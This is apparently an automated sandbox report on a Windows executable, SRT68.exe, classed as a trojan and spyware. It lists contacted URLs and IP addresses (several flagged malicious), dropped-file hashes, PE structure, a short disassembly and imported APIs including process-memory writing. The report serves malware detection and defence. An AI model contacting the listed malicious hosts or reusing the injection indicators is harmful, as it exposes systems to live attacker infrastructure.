https://www.bfyer.com?id=84562 | odbcconf.exe, 00000004.00000002.3836668787.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003326000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | odbcconf.exe, 00000004.00000002.3836668787.00000000064B4000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003E24000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.i7.ru/ | odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myssl.ru | VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fantastica.digital | VdxisCThGA.exe, 00000006.00000002.3837691374.0000000005242000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://i7.ru | VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://whois7.ru/?q=vpnto.net | odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://i7.ru/domains/#domreg | odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://i7.ru/domains/ | odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false
                                                                  high
                                                                  https://proxyspot.comodbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6MEodbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.00000000042DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://job.i7.ruVdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.remedies.pro | United States | 16509 | AMAZON-02US | false
209.74.77.107 | www.liveplah.live | United States | 31744 | MULTIBAND-NEWHOPEUS | true
185.27.134.144 | www.amayavp.xyz | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
199.59.243.227 | www.acond-22-mvr.click | United States | 395082 | BODIS-NJUS | false
84.32.84.32 | appsolucao.shop | Lithuania | 33922 | NTT-LT-ASLT | true
81.2.196.19 | bagatowcannabis.cloud | Czech Republic | 24806 | INTERNET-CZKtis238403KtisCZ | true
154.23.184.207 | d48dk.top | United States | 174 | COGENT-174US | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
91.226.30.3 | www.vpnto.net | Russian Federation | 56601 | I7-ASRU | true
195.110.124.133 | officinadelpasso.shop | Italy | 39729 | REGISTER-ASIT | true
154.88.22.105 | www.cg19g5.pro | Seychelles | 40065 | CNSERVERSUS | true
103.249.106.91 | www.8600228.xyz | China | 137443 | ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | true
194.58.112.174 | www.fantastica.digital | Russian Federation | 197695 | AS-REGRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568958
Start date and time: 2024-12-05 09:42:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SRT68.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@16/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 48
• Number of non-executed functions: 278
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
Time | Type | Description
03:43:47 | API Interceptor | 11853066x Sleep call for process: odbcconf.exe modified
Process: C:\Windows\SysWOW64\odbcconf.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209886597424439
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5: EFD26666EAE0E87B32082FF52F9F4C5E
SHA1: 603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256: 67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512: 28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious: false
Reputation: moderate, very likely benign file
                                                                    Process:C:\Users\user\Desktop\SRT68.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287744
                                                                    Entropy (8bit):7.994606275803805
                                                                    Encrypted:true
                                                                    SSDEEP:6144:hGzvZhjxTBLlvsjB//xiPAmSATBz//yoMs2AZ0h4rZIW:hGzxhjHLNaHUAIBy5KZ+4dt
                                                                    MD5:401D073347F93ACDE6EDCF2B9CC334E2
                                                                    SHA1:BC7723D102FAF089540C561C11415F15D41D244C
                                                                    SHA-256:EBBFF0E93A8E6E68CB67576421F3EB490C874C95436A99F39DB633BE825F2595
                                                                    SHA-512:10AE3757E4DF6DDCA77CB026CD931732B59E317C040CC6926409FDE467679041A751988D0056E1328D97BA075DD4A8E6E6810713D98097CF4723D225DFEF83C5
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.19321537227738
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:SRT68.exe
                                                                    File size:1'211'392 bytes
                                                                    MD5:71829b1e3a8cc54976390920f8c9282b
                                                                    SHA1:60777574082f65fa3436acd404fcec9fe8dd4c80
                                                                    SHA256:feaa7b0c24315f2516cc912f47bf1dce6cef3f007ccf05f94b0214ecdf255b3d
                                                                    SHA512:cfa3d8ea0468fc5a8e56e1bf6dbb3469ea77ab3d08464d8ef3d1e4743f213c663a3bdfef487bd1f3db78c98604e3c0add2443d2ee056819395aa5b5a76903549
                                                                    SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6FaUGqupjFh/5W9OM+GWY:Au0c++OCvkGs9FaUGFFh5W9OpY
                                                                    TLSH:1345CF2273DDC360CB669173BF6AB7016EBF3C614630B95B2F980D7DA950162162C7A3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                    Icon Hash:aaf3e3e3938382a0
                                                                    Entrypoint:0x427dcd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x674F97FD [Tue Dec 3 23:45:01 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                    Instruction
                                                                    call 00007F913CECB68Ah
                                                                    jmp 00007F913CEBE454h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [esp+10h]
                                                                    mov ecx, dword ptr [esp+14h]
                                                                    mov edi, dword ptr [esp+0Ch]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007F913CEBE5DAh
                                                                    cmp edi, eax
                                                                    jc 00007F913CEBE93Eh
                                                                    bt dword ptr [004C31FCh], 01h
                                                                    jnc 00007F913CEBE5D9h
                                                                    rep movsb
                                                                    jmp 00007F913CEBE8ECh
                                                                    cmp ecx, 00000080h
                                                                    jc 00007F913CEBE7A4h
                                                                    mov eax, edi
                                                                    xor eax, esi
                                                                    test eax, 0000000Fh
                                                                    jne 00007F913CEBE5E0h
                                                                    bt dword ptr [004BE324h], 01h
                                                                    jc 00007F913CEBEAB0h
                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                    jnc 00007F913CEBE77Dh
                                                                    test edi, 00000003h
                                                                    jne 00007F913CEBE78Eh
                                                                    test esi, 00000003h
                                                                    jne 00007F913CEBE76Dh
                                                                    bt edi, 02h
                                                                    jnc 00007F913CEBE5DFh
                                                                    mov eax, dword ptr [esi]
                                                                    sub ecx, 04h
                                                                    lea esi, dword ptr [esi+04h]
                                                                    mov dword ptr [edi], eax
                                                                    lea edi, dword ptr [edi+04h]
                                                                    bt edi, 03h
                                                                    jnc 00007F913CEBE5E3h
                                                                    movq xmm1, qword ptr [esi]
                                                                    sub ecx, 08h
                                                                    lea esi, dword ptr [esi+08h]
                                                                    movq qword ptr [edi], xmm1
                                                                    lea edi, dword ptr [edi+08h]
                                                                    test esi, 00000007h
                                                                    je 00007F913CEBE635h
                                                                    bt esi, 03h
                                                                    jnc 00007F913CEBE688h
                                                                    Programming Language:
                                                                    • [ASM] VS2013 build 21005
                                                                    • [ C ] VS2013 build 21005
                                                                    • [C++] VS2013 build 21005
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [ASM] VS2013 UPD4 build 31101
                                                                    • [RES] VS2013 build 21005
                                                                    • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5f20c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5f20c | 0x5f400 | a5f02612af664187f89b4795e4bc3b4d | False | 0.930407746883202 | data | 7.901432595864158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x564d3 | data | | | 1.0003281554551602
RT_GROUP_ICON | 0x125c8c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x125d04 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125d18 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x125d2c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x125d40 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x125e1c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
